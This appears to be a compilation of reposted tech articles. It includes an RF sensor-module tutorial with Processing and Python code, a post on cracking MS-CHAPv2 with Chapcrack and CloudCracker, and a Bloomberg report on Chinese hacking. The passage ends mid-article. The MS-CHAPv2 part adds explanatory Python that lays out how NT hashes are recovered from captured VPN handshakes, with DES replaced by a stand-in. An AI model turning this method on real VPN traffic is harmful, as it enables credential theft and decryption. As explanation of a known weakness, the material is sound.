Additional Android-compatible development options include Andromo, Application Craft, Hypernext Android Creator (HAC), Jo, jQTouch, MIT App Inventor, Togosoft Device Browser, Unity Mobile, WebApp.Net, Wink Toolkit, xUI, and Zepto.js. For more options, check out these roundups of Android development software from BuildMobile, Daily Tekk, MobiGeni, and Technology Trend Analysis. Meanwhile, post your own favorites in the comments section below.

Source: https://www.linux.com/news/embedded-mobile/mobile-linux/612366-15-android-ready-application-development-frameworks-
-
[h=1]Building wireless sensor applications using Dorji’s DRF5150S and DRF4432S RF modules (Part 1)[/h]

Dorji Applied Technology is a China-based company that primarily focuses on building different types of RF modules that can be easily incorporated in designing wireless data loggers, sensor networks, telemetry and other wireless applications. Their products mostly use RF transceiver chips from ADI, Infineon, and Silicon Labs. Some of their RF modules have an additional preprogrammed microcontroller that allows direct interface of selected analog and digital sensors to the module. This means you don’t need any external MCU or to write code for these sensors. I have been playing with their DRF5150S and DRF4432S RF modules for the past couple of weeks and I should admit that they are very versatile and easy to use. In this blog post, I will describe these two modules briefly, and illustrate how to put them together to construct a simple wireless sensor application where data from a remote sensor are received and displayed on a PC, without using any external microcontrollers.

Dorji's DRF5150S wireless sensor module

DRF5150S transmitter module

DRF5150S is a 433 MHz ISM band transmitter module based on Infineon’s TDA5150 device, which is a low power, multiband, multichannel ASK/FSK/GFSK RF transmitter chip for the sub-1 GHz ISM bands (300-320 MHz, 425-450 MHz, 863-928 MHz) with RF output power of up to +10 dBm. The DRF5150S module also has an ultra-low power STM8L151 microcontroller on board that is preprogrammed to control the overall operation of the transmitter. The module operates from 2.1-3.6V. The power supply and input/output pins are brought out to 0.1″ male header pins to make prototyping easier. The module can be configured to operate in one of the following two modes:

1. Data transmission mode

In data transmission mode the DRF5150S module acts as a normal data transmitter.
It receives data from a host MCU through a standard UART serial port and then sends them out to the RF receiving module. The receiving RF module that can be used with the DRF5150S is the DRF4432S. We will talk about that later. The DRF5150S also features a sleep mode during which no data is transmitted and the module consumes only 1.5µA of current.

2. Sensor data mode

The preprogrammed STM8L151 microcontroller on board allows you to connect selected digital and analog sensors directly to the DRF5150S module, which is a very nice feature of it. In this mode, the DRF5150S transmits the sensor data continuously at a preset interval along with its ID and the battery voltage information. The ID is useful to identify the source of transmission when there is more than one DRF5150S module transmitting. The ID is divided into two parts: Group ID and Slave ID. The Group ID of the receiving module (DRF4432S) should match the Group ID of the transmitting module, otherwise the receiver will ignore the transmitted data. However, multiple DRF5150S modules can share the same Group ID, but they should have different Slave IDs for identification on the receiving end. The module provides a 12-bit ADC channel that allows you to connect analog sensors, such as PT1000, LM34, LM35, TMP35, etc. It also features direct interfacing capability for DS18B20, SHT1X, and SHT2X digital sensors. The following picture shows the DRF5150S module and its pin configuration. The RXD and TXD are UART receive and transmit lines. They have alternative functions based on the mode of operation.

DRF5150S pins

Configuration tool

As I mentioned earlier, the DRF5150S provides multiple modes of operation. The module can be configured for a particular mode using PC software, DRF Tool, downloadable from Dorji’s website. The DRF Tool is a Windows based GUI application that communicates with the DRF5150S module connected to the PC through a USB-UART adapter.
The TXD, RXD, VCC, and GND pins of the DRF5150S module should be connected to the corresponding pins of the USB-UART module. Note that the VCC voltage should be 3-3.6V. Here is a snapshot of the DRF Tool. All supported modes can be seen through the Sensor Type drop-down menu, and you pick the one that you want to configure your DRF5150S module to. There are a lot of other things that you can do with this tool, such as setting the TX interval, RF frequency and data rate, sensor ID, etc.

DRF Tool for configuring the DRF5150S module

For illustrative purposes we will configure the transmitter module to DS18B20 High Resolution Mode. In this mode, a DS18B20 sensor can be directly interfaced to the DRF5150S module for measuring temperature with high resolution (12-bit). So we will select DS18B20 (High Resolution Mode) from the sensor type drop-down menu and set the transmitting interval to 2 seconds. The rest of the parameters are set as shown above. Now, we click on the Write W button to send these configuration settings to the DRF5150S module connected to the PC. The STM8L151 microcontroller on board receives this information and saves it into its internal EEPROM. The DRF5150S module is now configured for interfacing the DS18B20 temperature sensor. You should connect the sensor to the RF module as shown below.

Connecting a DS18B20 sensor to the DRF5150S RF module

DRF5150S RF transmitter and DS18B20 sensor setup on breadboard

I have made this setup on a breadboard and powered the circuit with a 3V coin cell battery (see the picture above). The DRF5150S reads 12-bit temperature data from the DS18B20 sensor and transmits it (at a 2 second interval) at a 50 kbps data rate using 434 MHz GFSK modulation. The transmitted data format of the DRF5150S is:

ID bytes (Group+Slave) + Data + BAT

The Group and Slave IDs are 1 byte each. The Data is 2 bytes long for the DS18B20 sensor. The last byte (BAT) contains the information about the battery strength.
You can calculate the battery voltage from BAT as:

Battery voltage = (BAT+200)/100

Altogether 5 bytes are transmitted for each temperature sample. Now let's look at the DRF4432S module, which is a matching receiver for the DRF5150S transmitter. In order to make this pair work together, they must be configured identically.

Dorji’s DRF4432S receiver module

The DRF4432S is a GFSK receiver module based on Silicon Laboratories’ Si4432 wireless ISM transceiver chip. This module is used together with the DRF5150S to build wireless sensor applications. It receives data from the DRF5150S transmitter module and transfers it through a UART serial interface. The picture below shows the pin diagram of the DRF4432S module. Please refer to the datasheet to find more details about these pins and their functions.

DRF4432S pins

The DRF4432S module must be configured in the same working mode as its complementary DRF5150S module. The configuration of the DRF4432S is done in a similar way using the DRF Tool. Again you need to connect the DRF4432S to the PC using a USB-UART adapter. Make sure you choose the same parameters in the DRF Tool for the receiver as you did for the transmitter. For our test application, the DRF4432S receiver module is also configured to DS18B20 High Resolution Mode, with RF frequency 434 MHz, RF data rate 50 kbps, and TX interval 2 sec. The transmitting and receiving modules can be configured to operate in a different frequency channel with 200 kHz spacing.

DRF4432S is configured similarly to the DRF5150S

We now interface the DRF4432S to the PC through the USB-UART adapter so that the received data bytes can be transferred to the PC. A PC application is developed using the Processing language, which receives the data and displays them on screen. The Enable (EN) pin of the DRF4432S must be pulled low in order for it to work. If the EN pin is pulled high, the receiver goes into sleep mode.
Since the DRF4432S has an on-board 3.3V regulator, it can operate from 3.4V to 5.5V.

DRF4432S is connected to the PC using a USB-UART adapter

DRF4432S and USB-UART connection

The output data format of the DRF4432S receiver is:

ID (group ID + slave ID) + Data + BAT + RSSI

It is the same as that of the transmitter module except that there is an additional byte (RSSI) which gives the field strength of the received signal. A higher RSSI value means a more reliable wireless link. The product datasheet says that if RSSI < 64 at a 50 kbps RF data rate, the field strength is considered weak and the probability of packet loss is high.

Processing application

The following Processing code is written to receive six bytes of data from the DRF4432S receiving module connected to the PC through a USB-UART interface. Information like the temperature of the remote station as sent by the DRF5150S module, the slave ID of the remote transmitting module, the battery voltage on the transmitting side, and the strength of the RF link between the transmitter and the receiver are extracted and displayed on the computer screen.
```java
/*
 Project: Wireless sensor application using DRF5150S and DRF4432S
 Written by: Rajendra Bhatt (www.embedded-lab.com)
 Date: 2012/08/2
*/

// Import the serial communication library
import processing.serial.*;

// Variable declaration
PFont font22, font44, font14;
PFont font12;
float tempC;
float tempF;
float y, h, BattV, Slave_ID, Byte1, Byte2, Byte3, Byte4, Byte5, Byte6, RSSI;
Serial USB_UART;
int i, j, xx = -15;

void setup() {
  // Define size of window
  size(350, 350);
  // Set up fonts for use throughout the application (.vlw files made with Tools > Create Font)
  font22 = loadFont("MicrosoftYaHei-22.vlw");
  font12 = loadFont("MicrosoftYaHei-12.vlw");
  font44 = loadFont("FranklinGothic-Demi-32.vlw");
  font14 = loadFont("TimesNewRomanPS-BoldMT-16.vlw");
  // Init serial communication port (COM6 is the USB-UART adapter on this PC; adjust as needed)
  USB_UART = new Serial(this, "COM6", 9600);
}

void draw() {
  // One DRF4432S frame is 6 bytes: Group ID, Slave ID, Data (2 bytes), BAT, RSSI.
  // Wait for a complete frame so that read() never returns -1 in the middle of one.
  while (USB_UART.available() >= 6) {
    Byte1 = USB_UART.read();   // Group ID
    Byte2 = USB_UART.read();   // Slave ID
    Byte3 = USB_UART.read();   // Data, low byte
    Byte4 = USB_UART.read();   // Data, high byte
    Byte5 = USB_UART.read();   // BAT (battery)
    Byte6 = USB_UART.read();   // RSSI (field strength)

    background(250, 250, 250); // Near-white background

    // Thermometer bulb and tube
    fill(200, 6, 0);
    smooth();
    stroke(0);
    strokeWeight(2);
    ellipse(100, 280, 58, 50);
    noStroke();
    fill(0, 46, 200);
    arc(100, 60, 30, 20, PI, PI + PI);
    rect(85, 60, 30, 200);
    fill(250, 250, 250);
    rect(95, 60, 10, 200);

    // Marks on thermometer: Fahrenheit scale on the left, Celsius on the right
    stroke(0);
    strokeWeight(1);
    textAlign(RIGHT);
    fill(0, 46, 250);
    for (int i = 0; i < 5; i += 1) {
      line(70, 230 - 40 * i, 80, 230 - 40 * i);
      if (i < 4) line(75, 210 - 40 * i, 80, 210 - 40 * i);
      textFont(font12);
      text(str(40 + 20 * i), 65, 235 - 40 * i);
    }
    textAlign(LEFT);
    for (int i = 0; i < 6; i += 1) {
      line(118, 242 - 35 * i, 128, 242 - 35 * i);
      if (i < 5) line(118, 225 - 35 * i, 123, 225 - 35 * i);
      textFont(font12);
      text(str(0 + 10 * i), 135, 247 - 35 * i);
    }
    noStroke();
    fill(0, 46, 250);
    textFont(font22);
    textAlign(LEFT);
    text("F", 57, 46);
    text("C", 135, 46);
    textFont(font12);
    text("o", 45, 35);
    text("o", 125, 35);
    fill(250, 90, 0);
    textFont(font22);
    text("o", 300 + xx, 45);
    text("o", 300 + xx, 85);

    // DS18B20 conversion: 16-bit two's complement value, 1/16 degC per LSB (12-bit mode)
    int raw = (int) Byte4 * 256 + (int) Byte3;
    if (raw > 32767) raw -= 65536;   // sign-extend so sub-zero readings display correctly
    tempC = raw / 16.0f;
    BattV = (Byte5 + 200) / 100;     // battery voltage from the BAT byte: (BAT+200)/100
    Slave_ID = Byte2;
    tempF = ((tempC * 9) / 5) + 32;
    RSSI = Byte6;

    // Numeric read-outs
    textFont(font44);
    text(nfc(tempC, 2), 200 + xx, 60);
    text(nfc(tempF, 2), 200 + xx, 100);
    text("C", 320 + xx, 60);
    text("F", 320 + xx, 100);
    textFont(font14);
    text("Battery Voltage = V", 190 + xx, 140);
    text(nfc(BattV, 2), 313 + xx, 140);
    text("Signal Strength = ", 190 + xx, 160);
    text(nfc(RSSI, 0), 313 + xx, 160);
    text("Slave ID = ", 190 + xx, 180);
    text(nfc(Slave_ID, 0), 313 + xx, 180);

    // Raise mercury level
    fill(200, 0, 0);
    y = -2.0 * tempF + 310;
    h = 270 - y;
    rect(95, y, 10, h);
  }
}
```

Download Processing source code and executables for different platforms (Windows, Linux, MacOS)

Output

I tested the setup by putting the DRF5150S sensor transmitter module in the front door porch of my house, with the receiver module connected to the PC in my spare bedroom on the second floor. The distance between the two is around 70 feet, with no line of sight. The received signal strength was found to be 179 (out of 255), which is really good.

Wireless sensor transmitter on my front door porch

Data received by the DRF4432S module are displayed on the computer screen

Summary

DRF5150S and DRF4432S are two complementary GFSK RF transmitter and receiver modules working in the 433 MHz ISM band, manufactured by Dorji Applied Technology. The presence of a pre-programmed microcontroller on board allows selected analog and digital sensors to be connected directly to the DRF5150S module, which collects data from the sensor and sends it out to the DRF4432S module at a configurable interval. The transmitter and the receiver can both be configured to operate for a particular sensor type through PC software. For illustrative purposes, we constructed a very simple wireless sensor application where the DRF5150S module read 12-bit temperature data from a DS18B20 sensor and transmitted it continuously at an interval of 2 seconds.
The DRF4432S receiver successfully received the temperature, ID, and battery strength bytes sent by the DRF5150S module and transferred the data to a PC through a USB-UART interface. A Processing application was developed to display the received data on the computer screen. More features and applications of these two RF modules will be explored in the second part of this tutorial. So stay tuned!

Source: Building wireless sensor applications using Dorji’s DRF5150S and DRF4432S RF modules (Part 1) :Embedded Lab
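An added example (mine, not code from the post or from Dorji): a small Python decoder for the 6-byte DRF4432S output frame described above (group ID + slave ID + 2 data bytes + BAT + RSSI), using the post's formulas for the DS18B20 value (raw/16) and the battery voltage ((BAT+200)/100), and flagging the datasheet's weak-link threshold (RSSI < 64 at 50 kbps). It goes slightly beyond the post in two ways worth having in any receiver: it treats the temperature as two's complement so sub-zero readings decode correctly, and it drops frames whose group ID is not the expected one, as the receiver itself does. The byte order of the 16-bit temperature (low byte first) is taken from the Processing sketch; the sample stream is constructed, not captured from hardware, and the function names are my own. Note that the frame format has no sync marker, so, like the Processing sketch, this assumes the stream starts on a frame boundary.

```python
"""Decoder for DRF4432S frames in DS18B20 high-resolution mode (added example)."""
import struct

FRAME_LEN = 6          # group ID, slave ID, 2 data bytes, BAT, RSSI
WEAK_RSSI = 64         # per the post: RSSI < 64 at 50 kbps means a weak link, packet loss likely


def parse_frame(frame, expected_group):
    """Decode one 6-byte DRF4432S frame. Returns None when the group ID does not
    match, mirroring the receiver's own group filter. Temperature byte order (low
    byte first) follows the Processing sketch; 'h' reads it as signed 16-bit so
    negative DS18B20 readings come out right."""
    if len(frame) != FRAME_LEN:
        raise ValueError("expected %d-byte frame, got %d bytes" % (FRAME_LEN, len(frame)))
    group, slave, raw, bat, rssi = struct.unpack("<BBhBB", frame)
    if group != expected_group:
        return None
    temp_c = raw / 16.0                        # 12-bit DS18B20: 1/16 degC per LSB
    return {
        "slave_id": slave,
        "temp_c": temp_c,
        "temp_f": temp_c * 9 / 5 + 32,
        "battery_v": (bat + 200) / 100.0,      # formula given in the post
        "rssi": rssi,
        "link_weak": rssi < WEAK_RSSI,
    }


def split_frames(buf):
    """Chunk a received byte stream into complete frames; the trailing partial frame
    (if any) is returned separately so the caller can prepend it to the next read."""
    n = len(buf) - len(buf) % FRAME_LEN
    return [buf[i:i + FRAME_LEN] for i in range(0, n, FRAME_LEN)], buf[n:]


def decode_stream(buf, expected_group):
    """Decode every complete frame in buf for one group; returns (readings, leftover)."""
    frames, rest = split_frames(buf)
    readings = [r for r in (parse_frame(f, expected_group) for f in frames) if r is not None]
    return readings, rest


# Constructed sample stream (NOT captured from real hardware), group ID 0x01:
SAMPLE = (
    bytes([0x01, 0x02, 0x91, 0x01, 0x92, 0xB3])   # slave 2: 0x0191/16 = 25.0625 C, BAT 0x92 -> 3.46 V, RSSI 179
    + bytes([0x01, 0x03, 0xF0, 0xFF, 0x64, 0x30]) # slave 3: 0xFFF0 -> -1.0 C (negative), RSSI 48 -> weak link
    + bytes([0x07, 0x02, 0x00, 0x00, 0x92, 0xB3]) # wrong group ID: dropped
    + bytes([0x01, 0x02, 0x91])                   # partial frame: carried over to the next read
)

if __name__ == "__main__":
    readings, leftover = decode_stream(SAMPLE, 0x01)
    for r in readings:
        print("slave %d: %.2f C (%.2f F), battery %.2f V, RSSI %d%s"
              % (r["slave_id"], r["temp_c"], r["temp_f"], r["battery_v"], r["rssi"],
                 " (weak link)" if r["link_weak"] else ""))
    print("leftover bytes:", leftover.hex())
```

In a real receiver loop, read whatever the serial port has, append it to the leftover from the previous call, and pass the whole buffer to `decode_stream`; the 2-second transmit interval makes an accidental mid-frame start easy to spot, since a misaligned stream decodes to nonsense group IDs and gets dropped.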
-
[h=2]Chapcrack and CloudCracker unlock MS-CHAPv2 based VPN Traffic[/h]

For those of us who missed David Hulton and Moxie Marlinspike’s Defcon 20 presentation on cracking MS-CHAPv2, here is an overview:

1) All users and providers of PPTP VPN solutions should immediately start migrating to a different VPN protocol. PPTP traffic should be considered unencrypted.

2) Enterprises who are depending on the mutual authentication properties of MS-CHAPv2 for connection to their WPA2 Radius servers should immediately start migrating to something else.

That is all, have a nice day…

Wait a minute, “PPTP traffic should be considered unencrypted,” what??? A recently released article by Moxie explains in detail how they are able to crack MS-CHAPv2 communication, used in many PPTP based VPNs, with a 100% success rate. But that is not all: the protocol is also used in WPA2 enterprise environments for connecting to Radius authentication servers. Ouch…

When VPNs started to become popular I remember the constant mantra that remote VPN communication is safe because it uses PPTP, safely encapsulating your traffic before sending it over the web. Well, it looks like this may not be the case anymore.

From Moxie’s article, the weakness lies in the user password hash and the three DES keys used in the encoding operation:

“The hash we’re after, however, is used as the key material for three DES operations. DES keys are 7 bytes long, so each DES operation uses a 7 byte chunk of the MD4 hash output. This gives us an opportunity for a classic divide and conquer attack. Instead of brute forcing the MD4 hash output directly (a complexity of 2^128), we can incrementally brute force 7 bytes of it at a time.“

The keys come from the output of the MD4 of the password, which is only 16 bytes. Microsoft fills in the difference by padding the last key with zeros. In doing so, this can significantly reduce the cracking time.
Moxie created a tool called Chapcrack that will pull the necessary information from a network packet capture and crack the third DES key. But this still leaves the first two DES keys, which could take a long time to crack. Unless, that is, you take the output from Chapcrack and upload it to CloudCracker. CloudCracker is an online password cracking service that connects to a mean FPGA based box built by Pico Computing that they claim can crack any DES key within 24 hours:

“They were able to build an FPGA box that implemented DES as a real pipeline, with one DES operation for each clock cycle. With 40 cores at 450mhz, that’s 18 billion keys/second. With 48 FPGAs, the Pico Computing DES cracking box gives us a worst case of ~23 hours for cracking a DES key, and an average case of about half a day.”

So basically, if you can get a network packet capture, you can use Chapcrack to pull the DES key from it, and then pass it to CloudCracker to crack it within 24 hours. Then you can decrypt the entire network packet capture, or log in to the user’s VPN or Radius server. Nice…

Looks like it is time to move on from MS-CHAPv2 based security products.

Source: Chapcrack and CloudCracker unlock MS-CHAPv2 based VPN Traffic
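An added example (mine, not Chapcrack's code and not from the post) that walks through the key split Moxie describes and the divide-and-conquer it enables. The NT hash is MD4 of the UTF-16LE password (MD4 is implemented inline, since hashlib's md4 is often missing under OpenSSL 3), the 8-byte challenge hash is SHA1(peer challenge || authenticator challenge || username)[:8] as in RFC 2759, and the hash is cut into three 7-byte DES keys, the third of which carries only 2 real bytes plus 5 zeros. Two things are assumptions of this demonstration rather than the protocol: DES is replaced by a clearly labelled HMAC-SHA256 stand-in, because the search only needs a known-plaintext encryption oracle to test candidate keys (a pure-Python DES would not fit here, and parity bits are therefore ignored), and the 2^56 pass over keys 1 and 2 is written as the real loop but run over a constructed candidate list, since the full keyspace is what the FPGA box is for. The challenge values and username are constructed. The point the code makes is the one in the quote: key 3 falls to 2^16 trial encryptions, and a single 2^56 pass recovers keys 1 and 2 together because each candidate is compared against both ciphertexts.

```python
"""MS-CHAPv2 NT-Response key split and divide-and-conquer (added example; DES is a stand-in)."""
import hashlib
import hmac
import struct


def md4(data):
    """Compact MD4 (RFC 1320), included because hashlib's md4 is frequently unavailable."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    hh = lambda x, y, z: x ^ y ^ z
    rol = lambda v, s: ((v << s) | (v >> (32 - s))) & 0xFFFFFFFF
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(48):
            if i < 16:      # round 1: F, message words in order
                fn, k, s, add = f, i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:    # round 2: G, column order, constant sqrt(2)
                fn, k, s, add = g, (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4], 0x5A827999
            else:           # round 3: H, bit-reversed order, constant sqrt(3)
                fn, k, s, add = hh, r3_order[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, rol((a + fn(b, c, d) + x[k] + add) & 0xFFFFFFFF, s), b, c
        h = [(u + v) & 0xFFFFFFFF for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password):
    """NT hash: MD4 over the UTF-16LE password. This 16-byte value is what the attack recovers."""
    return md4(password.encode("utf-16-le"))


def challenge_hash(peer_challenge, auth_challenge, username):
    """ChallengeHash (RFC 2759): first 8 bytes of SHA1(peer || authenticator || username)."""
    return hashlib.sha1(peer_challenge + auth_challenge + username).digest()[:8]


def des_oracle(key7, block8):
    """STAND-IN for one DES encryption (NOT real DES): HMAC-SHA256 truncated to 64 bits.
    The attack only needs a known-plaintext encryption oracle to test candidate keys,
    so the search structure below is the real one even though the primitive is not."""
    return hmac.new(key7, block8, hashlib.sha256).digest()[:8]


def split_keys(nthash):
    """Three 7-byte DES keys from the 16-byte hash: 7 + 7 + 2 bytes, the last zero-padded."""
    return nthash[0:7], nthash[7:14], nthash[14:16] + b"\x00" * 5


def nt_response(nthash, chash):
    """24-byte NT-Response: the 8-byte challenge hash encrypted under each of the 3 keys."""
    return b"".join(des_oracle(k, chash) for k in split_keys(nthash))


def crack_third_key(chash, response):
    """Key 3 has only 16 unknown bits, so at most 2^16 trial encryptions give hash[14:16]."""
    c3 = response[16:24]
    for v in range(1 << 16):
        cand = v.to_bytes(2, "big") + b"\x00" * 5
        if des_oracle(cand, chash) == c3:
            return cand
    return None


def crack_first_two_keys(chash, response, candidates):
    """One pass over the 7-byte keyspace serves BOTH remaining keys: each candidate is
    encrypted once and compared against c1 and c2, so the cost is 2^56, not 2 * 2^56.
    `candidates` is any iterable of 7-byte keys; the full search would be
    (i.to_bytes(7, 'big') for i in range(1 << 56)), which is the job of the FPGA box."""
    c1, c2 = response[0:8], response[8:16]
    k1 = k2 = None
    for cand in candidates:
        ct = des_oracle(cand, chash)
        if ct == c1:
            k1 = cand
        if ct == c2:
            k2 = cand
        if k1 is not None and k2 is not None:
            break
    return k1, k2


def recover_nt_hash(chash, response, candidates):
    """Reassemble the NT hash from the three cracked keys. With the hash (no password
    needed) an attacker can derive the MPPE session keys or authenticate as the user."""
    k3 = crack_third_key(chash, response)
    k1, k2 = crack_first_two_keys(chash, response, candidates)
    if k1 is None or k2 is None or k3 is None:
        return None
    return k1 + k2 + k3[:2]
```

Everything Chapcrack needs (username, both challenges, and the 24-byte response) travels in the clear in the PPTP/CHAP exchange, which is why a passive capture is enough; the password itself is never needed, since the recovered NT hash is the key material for the rest of the session.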
-
[h=1]Hackers Linked to China’s Army Seen From EU to D.C.[/h]By Michael Riley and Dune Lawrence - Jul 27, 2012 2:00 AM GMT+0300 The hackers clocked in at precisely 9:23 a.m. Brussels time on July 18 last year, and set to their task. In just 14 minutes of quick keyboard work, they scooped up the e-mails of the president of the European Union Council, Herman Van Rompuy, Europe’s point man for shepherding the delicate politics of the bailout for Greece, according to a computer record of the hackers’ activity. Over 10 days last July, the hackers returned to the council’s computers four times, accessing the internal communications of 11 of the EU’s economic, security and foreign affairs officials. The breach, unreported until now, potentially gave the intruders an unvarnished view of the financial crisis gripping Europe. And the spies were themselves being watched. Working together in secret, some 30 North American private security researchers were tracking one of the biggest and busiest hacking groups in China. Observed for years by U.S. intelligence, which dubbed it Byzantine Candor, the team of hackers also is known in security circles as the Comment group for its trademark of infiltrating computers using hidden webpage computer code known as “comments.” During almost two months of monitoring last year, the researchers say they were struck by the sheer scale of the hackers’ work as data bled from one victim after the next: from oilfield services leader Halliburton Co. (HAL) to Washington law firm Wiley Rein LLP; from a Canadian magistrate involved in a sensitive China extradition case to Kolkata-based tobacco and technology conglomerate ITC Ltd. (ITC) [h=2]Gathering Secrets[/h]The researchers identified 20 victims in all -- many of them organizations with secrets that could give China an edge as it strives to become the world’s largest economy. 
The targets included lawyers pursuing trade claims against the country’s exporters and an energy company preparing to drill in waters China claims as its own. “What the general public hears about -- stolen credit card numbers, somebody hacked LinkedIn (LNKD) -- that’s the tip of the iceberg, the unclassified stuff,” said Shawn Henry, former executive assistant director of the FBI in charge of the agency’s cyber division until leaving earlier this year. “I’ve been circling the iceberg in a submarine. This is the biggest vacuuming up of U.S. proprietary data that we’ve ever seen. It’s a machine.” Exploiting a hole in the hackers’ security, the researchers created a digital diary, logging the intruders’ every move as they crept into networks, shut off anti-virus systems, camouflaged themselves as system administrators and covered their tracks, making them almost immune to detection by their victims. [h=2]Every Move[/h]The minute-by-minute accounts spin a never-before told story of the workaday routines and relentless onslaught of a group so successful that a cyber unit within the Air Force’s Office of Special Investigations in San Antonio is dedicated to tracking it, according to a person familiar with the unit. Those logs -- a record of the hackers’ commands to their victims’ computers -- also reveal the highly organized effort behind a group that more than any other is believed to be at the spear point of the vast hacking industry in China. Byzantine Candor is linked to China’s military, the People’s Liberation Army, according to a 2008 diplomatic cable released by WikiLeaks. Two former intelligence officials verified the substance of the document. [h=2]Hackers and Spies[/h]The methods behind China-based looting of technology and data -- and most of the victims -- have remained for more than a decade in the murky world of hackers and spies, fully known in the U.S. only to a small community of investigators with classified clearances. 
“Until we can have this conversation in a transparent way, we are going to be hard pressed to solve the problem,” said Amit Yoran, former National Cyber Security Division director at the Department of Homeland Security. Yoran now works for RSA Security Inc., a Bedford, Massachusetts-based security company which was hacked by Chinese teams last year. “I’m just not sure America is ready for that,” he said. What started as assaults on military and defense contractors has widened into a rash of attacks from which no corporate entity is safe, say U.S. intelligence officials, who are raising the alarm in increasingly dire terms. In an essay in the Wall Street Journal July 19, President Barack Obama warned that “the cyber threat to our nation is one of the most serious economic and national security challenges we face.” Ten days earlier, in a speech given in Washington, National Security Agency director Keith Alexander said cyber espionage constitutes “the greatest transfer of wealth in history,” and cited a figure of $1 trillion spent globally every year by companies trying to protect themselves. [h=2]Harvesting Secrets[/h]The networks of major oil companies have been harvested for seismic maps charting oil reserves; patent law firms for their clients’ trade secrets; and investment banks for market analysis that might impact the global ventures of state-owned companies, according to computer security experts who asked not to be named and declined to give more details. China’s foreign ministry in Beijing has previously dismissed allegations of state-sponsored cyberspying as baseless and said the government would crack down if incidents came to light. Contacted for this story, it did so again, referring to earlier ministry statements. Private researchers have identified 10 to 20 Chinese hacking groups but said they vary significantly in activity and size, according to government investigators and security firms. 
[h=2]Group Apart[/h]What sets the Comment group apart is the frenetic pace of its operations. The attacks documented last summer represent a fragment of the Comment group’s conquests, which stretch back at least to 2002, according to incident reports and interviews with investigators. Milpitas, California-based FireEye Inc. alone has tracked hundreds of victims in the last three years and estimates the group has hacked more than 1,000 organizations, said Alex Lanstein, a senior security researcher. Stolen information is flowing out of the networks of law firms, investment banks, oil companies, drug makers, and high technology manufacturers in such significant quantities that intelligence officials now say it could cause long-term harm to U.S. and European economies. [h=2]’Earthquake Is Coming’[/h]“The activity we’re seeing now is the tremor, but the earthquake is coming,” said Ray Mislock, who before retiring in September was chief security officer for DuPont Co., which has been hacked by unidentified Chinese teams at least twice since 2009. “A successful company can’t sustain a long-term loss of knowledge that creates economic power,” he said. Even those offline aren’t safe. Y.C. Deveshwar, 65, a businessman who heads ITC, India’s largest maker of cigarettes, doesn’t use a computer. The Comment hackers last year still managed to steal a trove of his documents, navigating the conglomerate’s huge network to pinpoint the machine used by Deveshwar’s personal assistant. On July 5, 2011, the thieves accessed a list of documents that included Deveshwar’s family addresses, tax filings, and meeting minutes, as well as letters to fellow executives, such as London-based British American Tobacco Plc (BATS) chairman Richard Burrows and BAT chief executive, Nicandro Durante, according to the logs. They tried to open one entitled “YCD LETTERS” but couldn’t, so the hackers set up a program to steal a password the next time his assistant signed on. 
[h=2]Keeping Quiet[/h]When Bloomberg contacted the company in May, spokesman Nazeeb Arif said ITC was unaware of the breach, potentially giving the hackers unimpeded access to ITC’s network for more than a year. Deveshwar said in a statement that “no classified company related documents” were kept on the computer. Companies that discover their networks have been commandeered usually keep quiet, leaving the public, shareholders and clients unaware of the magnitude of the problem. Of the 10 Comment group victims reached by Bloomberg, those who learned of the hacks chose not to disclose them publicly, and three said they were unaware they’d been hacked until contacted for this story. This account of the Comment group is based on the researchers’ logs, as well as interviews with current and former intelligence officials, victims, and more than a dozen U.S. cybersecurity experts, many of whom track the group independently. [h=2]Private Investigators[/h]The researcher who provided the computer logs asked not to be named because of the sensitivity of the data, which included the name of victims. He was part of a collaborative drawn from 20 organizations that included people from private security companies, a university, internet service providers and companies that have been targeted, including a defense contractor and a pharmaceutical firm. The group included some of the top experts in the field, with experience investigating cyberspying against the U.S. government, major corporations and high profile political targets, including the Dalai Lama. Like similar, ad hoc teams formed temporarily to study hackers’ techniques, the group worked in secret because of the sensitivities of the investigation aimed at state-sponsored espionage. A smaller version of the group is continuing its research. 
As the surge in attacks on businesses and non-government groups over the last five years has pulled private security experts into the hacker hunt, they say they’re gradually catching up with U.S. counterintelligence agencies, which have been tackling the problem for a decade.

[h=2]Espionage Tools[/h]
One Comment group trademark involves hijacking unassuming public websites to send commands to victim computers, turning mom-and-pop sites into tools of foreign espionage, but also allowing the group to be monitored if those websites can be found, according to security experts. Sites it has commandeered include one for a teacher at a south Texas high school with the website motto “Computers Rock!” and another for a drag racing track outside Boise, Idaho.

Adding a potentially important piece to the puzzle, researcher Joe Stewart, who works for Dell SecureWorks, an Atlanta-based security firm and division of Dell Inc. (DELL), the computer technology company, last year uncovered a flaw in software used by Comment group hackers. Designed to disguise the pilfered data’s ultimate destination, the mistake instead revealed that in hundreds of instances, data was sent to Internet Protocol (IP) addresses in Shanghai.

[h=2]Military Link?[/h]
The location matched intelligence contained in the 2008 State Department cable published by WikiLeaks that placed the group in Shanghai and linked it to China’s military. Commercial researchers have yet to make that connection. The basis for that cable’s conclusion, which includes the U.S.’s own spying, remains classified, according to two former intelligence specialists.

Lanstein said that although the make-up of the Comment group has changed over time -- the logs show some inexperienced hackers in the group making repeated mistakes, for example -- the characteristics of a single group are unmistakable. The code and tools used by Comment aren’t public, and anyone using them would have to be given entree into the hackers’ ranks, he said.
By October 2008, when the diplomatic cable published by WikiLeaks outlined the group’s activities, the Comment group had raided the networks of defense contractors and the Department of State, as well as made a specialty of hacking U.S. Army systems. The classified code names for China’s hacking teams were changed last year after that leak.

Cybersecurity experts have connected the group to a series of headline-grabbing hacks, ranging from the 2008 presidential campaigns of Barack Obama and John McCain to the 72 victims documented last year by the Santa Clara, California-based security firm McAfee Inc., in what it called Operation Shady Rat.

[h=2]Nuclear Break-In[/h]
